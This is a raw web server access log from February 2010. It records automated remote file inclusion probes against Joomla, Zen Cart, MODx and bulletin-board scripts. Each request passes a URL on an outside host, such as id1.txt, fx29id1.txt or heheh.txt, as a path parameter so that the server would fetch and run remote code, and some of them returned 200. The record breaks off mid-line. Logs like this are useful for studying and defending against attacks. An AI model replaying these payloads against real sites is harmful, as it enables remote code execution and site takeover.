66.103.128.44 - - [07/Feb/2010:09:37:18 -0800] "GET /logs/access_100202.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:39:20 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:39:21 -0800] "GET /logs/access_100116.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:39:21 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:39:21 -0800] "GET /logs/access_100103.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:39:26 -0800] "GET /logs/access_100119.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:09:39:32 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:09:39:32 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:09:39:33 -0800] "GET /logs/access_100202.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:39:40 -0800] "GET /logs/access_100106.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:39:43 -0800] "GET /logs/access_100110.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:40:13 -0800] "GET /logs/access_100103.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:40:18 -0800] "GET /logs/access_100119.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:40:41 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:40:41 -0800] "GET /logs/access_100116.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:40:41 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:40:50 -0800] "GET /logs/access_100106.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:41:44 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:41:47 -0800] "GET /logs/oneadmin/config.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:41:47 -0800] "GET /oneadmin/config.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:41:47 -0800] "GET /logs/access_100103.log%20%20/oneadmin/config.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:03 -0800] "GET /logs/access_100116.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:03 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:03 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:18 -0800] "GET /logs/access_100106.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:18 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:18 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:18 -0800] "GET /logs/access_100116.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:21 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:21 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:21 -0800] "GET /logs/access_100116.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:31 -0800] "GET /logs/access_100106.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:40 -0800] "GET /logs/access_100116.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:40 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:42:40 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:43:07 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:43:17 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:43:17 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:44:00 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:44:00 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:44:00 -0800] "GET /logs/access_100121.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [07/Feb/2010:09:44:09 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [07/Feb/2010:09:44:09 -0800] "GET /logs/access_100202.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [07/Feb/2010:09:44:09 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:09:44:09 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:09:44:09 -0800] "GET /logs/access_100107.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:09:44:09 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:44:32 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:44:34 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:44:34 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [07/Feb/2010:09:44:42 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [07/Feb/2010:09:44:42 -0800] "GET /logs/access_100123.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [07/Feb/2010:09:44:47 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Feb/2010:09:44:58 -0800] "GET /logs/access_100113.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [07/Feb/2010:09:45:15 -0800] "GET /logs/access_100111.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:45:28 -0800] "GET /logs/access_100202.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [07/Feb/2010:09:45:28 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [07/Feb/2010:09:45:28 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [07/Feb/2010:09:45:28 -0800] "GET /logs/access_100202.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [07/Feb/2010:09:45:53 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [07/Feb/2010:09:45:53 -0800] "GET /logs/access_100202.log//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [07/Feb/2010:09:45:53 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:45:54 -0800] "GET /logs/access_100201.log%20%20/oneadmin/config.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [07/Feb/2010:09:46:21 -0800] "GET /logs/access_100125.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [07/Feb/2010:09:46:52 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [07/Feb/2010:09:46:52 -0800] "GET /logs/access_100123.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [07/Feb/2010:09:46:58 -0800] "GET /logs/access_100111.log//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:21 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:21 -0800] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:21 -0800] "GET /index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:22 -0800] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:22 -0800] "GET /index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:22 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:27 -0800] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:27 -0800] "GET /index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:32 -0800] "GET /index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:32 -0800] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:35 -0800] "GET /logs/access_100121.log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:47:41 -0800] "GET /logs/access_100121.log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:48:00 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:48:16 -0800] "GET /logs/access_100122.log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:48:17 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [07/Feb/2010:09:48:26 -0800] "GET /logs/access_100122.log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:28 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:28 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:28 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:29 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:29 -0800] "GET /logs/access_100118.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:29 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.60.28.10 - - [07/Feb/2010:09:48:30 -0800] "GET /logs/access.log%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.60.28.10 - - [07/Feb/2010:09:48:30 -0800] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.60.28.10 - - [07/Feb/2010:09:48:30 -0800] "GET /index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.60.28.10 - - [07/Feb/2010:09:48:31 -0800] "GET /logs/access.log%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.60.28.10 - - [07/Feb/2010:09:48:31 -0800] "GET /index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.60.28.10 - - [07/Feb/2010:09:48:31 -0800] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:32 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:32 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:32 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:48:34 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:48:35 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:35 -0800] "GET /logs/access_100118.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:35 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:35 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:41 -0800] "GET /logs/access_100106.log%20%20//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:09:48:43 -0800] "GET /logs/access_100121.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:43 -0800] "GET /logs/access_100106.log%20%20//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.19.177.19 - - [07/Feb/2010:09:48:46 -0800] "GET /logs/access_100106.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig.absolute_path=http://i